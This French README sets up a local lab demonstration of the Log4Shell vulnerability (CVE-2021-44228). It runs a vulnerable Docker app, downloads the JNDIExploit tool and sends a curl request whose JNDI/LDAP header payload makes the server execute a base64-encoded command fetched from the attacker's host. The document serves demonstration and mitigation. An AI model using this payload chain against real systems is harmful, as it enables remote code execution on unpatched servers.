
Ce dépôt sert à la démonstration et à l’atténuation de la vulnérabilité Log4j 2021 (CVE-2021-44228).
Ce dépôt est destiné à la démonstration et à l'atténuation de la vulnérabilité Log4j 2021 (CVE-2021-44228).
La vulnérabilité CVE-2021-44228 / Log4Shell consiste à injecter dans un logiciel vulnérable une charge utile malveillante, qui demandera à Log4J d'obtenir une valeur auprès d'une source tierce, via JNDI et le protocole LDAP. ... Les données importées peuvent être du code, qui sera exécuté par Log4J sur le système.
Nous exécutons une application web Spring Boot vulnérable à CVE-2021-44228 dans Docker, surnommée Log4Shell par @christophetd.
Elle utilise Log4j 2.14.1 (via spring-boot-starter-log4j2 2.6.1) et le JDK 1.8.0_181.
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Nous téléchargeons l'exploit JNDI pour Log4Shell depuis les archives web dans ce cas, mais vous pouvez le télécharger où il est disponible.
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

Nous obtenons l'adresse IP de notre machine qui exécute le docker de l'application Log4Shell.
ifconfig

Nous décompressons le zip contenant l'exploit JNDI pour Log4Shell, afin d'obtenir le JAR, puis nous l'exécutons en indiquant notre IP obtenue à l'étape 3.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Vidéo expliquant comment atténuer la vulnérabilité Log4Shell sous Windows et Linux : ATTÉNUATION

Feryael Justice 2022